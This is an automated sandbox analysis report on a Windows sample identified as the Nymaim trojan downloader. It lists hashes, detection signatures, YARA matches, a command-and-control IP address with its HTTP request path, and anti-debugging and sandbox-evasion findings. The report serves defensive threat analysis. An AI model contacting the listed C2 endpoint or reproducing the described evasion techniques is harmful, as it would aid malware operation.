Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1565680
MD5:d2a93d9f269cbd3b444400d586999e01
SHA1:3d9df1a3c04f61e2ed1f89a0fc42021dd120546b
SHA256:f4c52e24f469d177317286ffccf86673a2ab2fb4164a47fd1898151b85a13e05
Tags:exeuser-Bitsight
Infos:

Detection

Nymaim
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Nymaim
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found potential dummy code loops (likely to delay analysis)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6624 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D2A93D9F269CBD3B444400D586999E01)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
NymaimNymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

Malware Configuration

Threatname: Nymaim

{"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
    00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    00000000.00000003.1671985450.0000000004A40000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
      00000000.00000002.4101417478.00000000047A0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x8436:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.file.exe.400000.0.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
          0.2.file.exe.4950e67.1.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
            0.3.file.exe.4a40000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
              0.2.file.exe.400000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub7-2476756634-1002Avira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubLAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub767Avira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub-0Avira URL Cloud: Label: malware
                Found malware configuration
                Source: 0.3.file.exe.4a40000.0.raw.unpackMalware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 36%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004035D0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_004035D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04953837 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_04953837
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                Networking

                barindex
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Joe Sandbox ViewIP Address: 185.156.72.65 185.156.72.65
                Source: Joe Sandbox ViewASN Name: ITDELUXE-ASRU ITDELUXE-ASRU
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401970
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: file.exe, 00000000.00000002.4100010455.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/K
                Source: file.exe, 00000000.00000002.4100010455.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                Source: file.exe, 00000000.00000002.4100010455.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub-0
                Source: file.exe, 00000000.00000002.4100010455.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub7-2476756634-1002
                Source: file.exe, 00000000.00000002.4100010455.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub767
                Source: file.exe, 00000000.00000002.4100010455.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubL
                Source: file.exe, 00000000.00000002.4100010455.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4100010455.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubl

                E-Banking Fraud

                barindex
                Yara detected Nymaim
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.4950e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.4a40000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1671985450.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.4101417478.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004109400_2_00410940
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041A3460_2_0041A346
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EBC70_2_0040EBC7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403D400_2_00403D40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415E590_2_00415E59
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B6D00_2_0040B6D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EE00_2_00402EE0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404F700_2_00404F70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EF090_2_0040EF09
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041572E0_2_0041572E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D0_2_005F108D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EDA5C0_2_005EDA5C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F2A520_2_005F2A52
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E8A420_2_005E8A42
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A8A250_2_005A8A25
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E53740_2_005E5374
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F73200_2_004F7320
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00587B2C0_2_00587B2C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00473BFC0_2_00473BFC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004964660_2_00496466
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DFC9D0_2_005DFC9D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EF55C0_2_005EF55C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F45440_2_005F4544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E3DC20_2_005E3DC2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EC5BA0_2_004EC5BA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E6F240_2_005E6F24
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0048EF9F0_2_0048EF9F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007073310_2_00707331
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_049551D70_2_049551D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495EE2E0_2_0495EE2E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04953FA70_2_04953FA7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_049659950_2_04965995
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_049551D70_2_049551D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495B9370_2_0495B937
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495F1700_2_0495F170
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04960BA70_2_04960BA7
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0495AA07 appears 34 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040A7A0 appears 35 times
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.4101417478.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: file.exeStatic PE information: Section: ZLIB complexity 0.9955546709129511
                Source: file.exeStatic PE information: Section: encvjseq ZLIB complexity 0.9922970530236634
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A50
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_047A8464 CreateToolhelp32Snapshot,Module32First,0_2_047A8464
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401970
                Source: C:\Users\user\Desktop\file.exeCommand line argument: nosub0_2_004087E0
                Source: C:\Users\user\Desktop\file.exeCommand line argument: mixtwo0_2_004087E0
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 36%
                Source: file.exeString found in binary or memory: /add?substr=
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2024448 > 1048576
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: file.exeStatic PE information: Raw size of encvjseq is bigger than: 0x100000 < 0x1abe00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;encvjseq:EW;schszwjt:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1f1d49 should be: 0x1ee96b
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: encvjseq
                Source: file.exeStatic PE information: section name: schszwjt
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A237 push ecx; ret 0_2_0040A24A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00421B7D push esi; ret 0_2_00421B86
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push 4A9A039Bh; mov dword ptr [esp], esi0_2_005F1095
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push 143758B0h; mov dword ptr [esp], edx0_2_005F10D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push 1AB64C36h; mov dword ptr [esp], ebx0_2_005F1110
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push edi; mov dword ptr [esp], ebx0_2_005F1144
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push 1B693A1Dh; mov dword ptr [esp], esi0_2_005F11B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push ecx; mov dword ptr [esp], edx0_2_005F1209
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push 11D166E9h; mov dword ptr [esp], edi0_2_005F122E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push 6E5359C6h; mov dword ptr [esp], ebp0_2_005F125D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push 00E79D54h; mov dword ptr [esp], ebp0_2_005F12B9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push edi; mov dword ptr [esp], 0E1A9CB1h0_2_005F12C7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push ecx; mov dword ptr [esp], edi0_2_005F137F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push edx; mov dword ptr [esp], edi0_2_005F13AF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push 545A6213h; mov dword ptr [esp], ebp0_2_005F13EF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push ebx; mov dword ptr [esp], edx0_2_005F147D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push 53414C7Bh; mov dword ptr [esp], esi0_2_005F148F
